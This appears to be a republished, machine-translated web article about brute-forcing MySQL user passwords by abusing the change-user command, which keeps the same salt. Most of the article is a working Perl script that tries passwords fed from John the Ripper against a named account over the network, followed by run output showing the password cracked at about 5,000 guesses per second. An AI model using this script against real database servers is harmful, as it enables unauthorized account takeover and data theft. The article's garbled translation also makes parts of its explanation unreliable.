Fast and efficient hacking of MySQL local and remote passwords

Source: Internet
Author: User
Tags perl script

Http://www.kankanews.com/ICkengine/archives/212.shtml

Fast MySQL local and remote password cracking! The first thing that needs to be said to the database maintainer is that you don't have to be nervous, you don't have to fix the problem, it looks like a small mistake.

I found a way to hack MySQL's user passwords very efficiently, including local Users and user passwords accessed over the network. In my test, 5,000 passwords are tested per second by means of a network method.

Here's how:

An attacker uses an unprivileged account to log on to the MySQL server, and MySQL has a command called Change_user, which can be used to name suggestions when modifying a user in a MySQL session. Because this command executes very quickly, it can be used very quickly to hack the MySQL password instead of reconnecting to the MySQL server every time.

What causes very slow?

Because using the Change_user command does not change the salt (which is a weakness), the usual way to hack the password is to send a different salt to the server each time the connection is made.

Here is a Perl script that uses the John the Ripper method to generate the password:

The test user is Crackme password is pass, only a few seconds can be cracked.

(approximately 20 seconds to test 100,000 passwords)

The test script is as follows:
Use Net::mysql;

$|=1;

My $mysql = Net::mysql->new (
hostname = ' 192.168.2.3′,
Database = ' Test ',
user = "User",
Password = "Secret",
debug = 0,
);

$crackuser = "Crackme";

while (<stdin>) {
Chomp
$currentpass = $_;

$VV = join "",
$crackuser,
"\x14″.
Net::mysql::P assword->scramble (
$currentpass, $mysql->{salt}, $mysql->{client_capabilities}
) . “”;
if ($mysql->_execute_command ("\x11″, $VV) ne undef) {
Print "[*] cracked! –> $currentpass \ n ";
Exit
}
}

Here are the results of my execution on this machine:
C:\users\kingcope\desktop>c:\users\kingcope\desktop\john179\run\jo

hn–incremental–stdout=5 | Perl mysqlcrack.pl
Warning:maxlen = 8 is too large for the current hash type, reduced to 5
words:16382 time:0:00:00:02 w/s: 6262 current:citch
words:24573 time:0:00:00:04 w/s: 4916 current:rap
words:40956 time:0:00:00:07 w/s: 5498 current:matc3
words:49147 time:0:00:00:09 w/s: 5030 current:4429
words:65530 time:0:00:00:12 w/s: 5354 current:ch141
words:73721 time:0:00:00:14 w/s: 5021 current:v3n
words:90104 time:0:00:00:17 w/s: 5277 current:pun2
[*] cracked! –> Pass
words:98295 time:0:00:00:18 w/s: 5434 current:43gs

Session aborted

No tags for this post.

Unless indicated, this site article is original or compiles, reprint please specify: Article from Kengine | Kankanews.com

Fast and efficient hacking of MySQL local and remote passwords

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.